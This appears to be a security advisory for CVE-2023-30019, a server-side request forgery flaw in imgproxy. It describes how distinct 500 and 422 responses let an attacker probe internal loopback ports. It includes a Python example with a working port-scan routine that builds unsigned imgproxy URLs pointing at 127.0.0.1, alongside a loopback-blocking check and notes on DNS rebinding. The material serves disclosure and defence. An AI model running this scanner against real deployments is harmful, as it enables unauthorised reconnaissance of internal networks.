CVE-2023-30019: SSRF in imgproxy <= 3.14.0
imgproxy <= 3.14.0 is vulnerable to Server-Side Request Forgery (SSRF) because the imageURL parameter is not sanitized before the source image is fetched.
Project: GitHub - imgproxy/imgproxy: Fast and secure standalone server for resizing and converting remote images
In affected versions the restriction on loopback source addresses is not enforced: an attacker can still pass a loopback address as part of the imageURL parameter, and imgproxy will connect to it from the server side.
This turns the service into an oracle for enumerating internal hosts and ports. The oracle is error based, because the application returns one of two distinct responses depending on whether the connection succeeded:
- 500 Internal Server Error (Source image is unreachable): the URL could not be fetched, meaning the host is down or the port is closed.
- 422 Unprocessable Entity (Invalid source image): the connection succeeded (host up, port open) but the response was not a valid image.
Mitigation: https://github.com/imgproxy/imgproxy/commit/1a9768a2c682e88820064aa3d9a05ea234ff3cc4
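The following is an added example, not code from the advisory or from the imgproxy project. It shows both sides of the issue described above: how the 500/422 difference lets an attacker drive imgproxy as a port scanner against its own loopback interface, and the kind of source-address check that closes that path. Everything deployment-specific is assumed: the instance address in IMGPROXY_BASE, an instance running with URL signing disabled (the literal "insecure" signature segment), and imgproxy's plain source-URL form with processing options omitted. The HTTP fetch is injected as a callable so the logic runs offline against a constructed fake.

```python
"""Error-based SSRF oracle against imgproxy, and a loopback-source check.

Added example (not imgproxy's code). Assumptions, not from the advisory:
  - IMGPROXY_BASE is where the affected instance listens.
  - The instance accepts unsigned URLs ("insecure" signature segment) and
    plain source URLs with processing options omitted.
  - `fetch` returns only the HTTP status code of the imgproxy response.
"""
import ipaddress
import socket
from typing import Callable, Dict, Iterable
from urllib.parse import urlparse

IMGPROXY_BASE = "http://imgproxy.example.internal:8080"  # assumed deployment

# Status codes the advisory describes, and what each one leaks.
UNREACHABLE = 500  # "Source image is unreachable": host down or port closed
REACHABLE = 422    # "Invalid source image": connection succeeded, not an image


def build_probe_url(host: str, port: int, path: str = "/") -> str:
    """Build an imgproxy request whose source URL targets host:port.

    URL layout assumed: /<signature>/plain/<source-url>, with the literal
    "insecure" signature used when signing is disabled.
    """
    return f"{IMGPROXY_BASE}/insecure/plain/http://{host}:{port}{path}"


def classify(status: int) -> str:
    """Translate the error-based oracle into a port state."""
    if status == REACHABLE:
        return "open"
    if status == UNREACHABLE:
        return "closed"
    return "unknown"  # e.g. 403 when the target is filtered after the fix


def scan(host: str, ports: Iterable[int],
         fetch: Callable[[str], int]) -> Dict[int, str]:
    """Drive the oracle over a set of ports via the injected fetch."""
    return {p: classify(fetch(build_probe_url(host, p))) for p in ports}


# --- defender side: reject loopback sources before any fetch happens ---------

def is_loopback_source(source_url: str) -> bool:
    """True if the source host is, or resolves to, a loopback address.

    Illustrative check only; imgproxy's real fix is in the linked commit.
    Fails closed on anything it cannot parse or resolve.
    """
    host = urlparse(source_url).hostname
    if host is None:
        return True
    if host == "localhost":
        return True
    try:
        # IPv4 and IPv6 literals (urlparse strips the [] around IPv6).
        return ipaddress.ip_address(host).is_loopback
    except ValueError:
        pass
    try:
        infos = socket.getaddrinfo(host, None)
    except socket.gaierror:
        return True
    # getaddrinfo also normalises short forms such as "127.1" to 127.0.0.1.
    return any(ipaddress.ip_address(info[4][0]).is_loopback for info in infos)


def fake_fetch(url: str) -> int:
    """Constructed stand-in for a real request: ports 6379 and 8080 open."""
    return REACHABLE if url.endswith((":6379/", ":8080/")) else UNREACHABLE


if __name__ == "__main__":
    for port, state in scan("127.0.0.1", [22, 6379, 8080], fake_fetch).items():
        print(f"127.0.0.1:{port} -> {state}")
    for src in ("http://127.0.0.1:6379/", "http://[::1]/", "http://203.0.113.10/a.png"):
        print(src, "blocked" if is_loopback_source(src) else "allowed")
```

Two caveats on the defender-side check. It must be applied to the address actually connected to, not only to the string in the URL: a check that resolves a hostname and then lets the HTTP client resolve it again is open to DNS rebinding, so resolve once and connect to that IP. And loopback is only one class of internal target; the same check should cover link-local and private ranges unless the deployment explicitly needs them.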
Related news
imgproxy prior to version 3.15.0 is vulnerable to Server-Side Request Forgery (SSRF) due to a lack of sanitization of the imageURL parameter.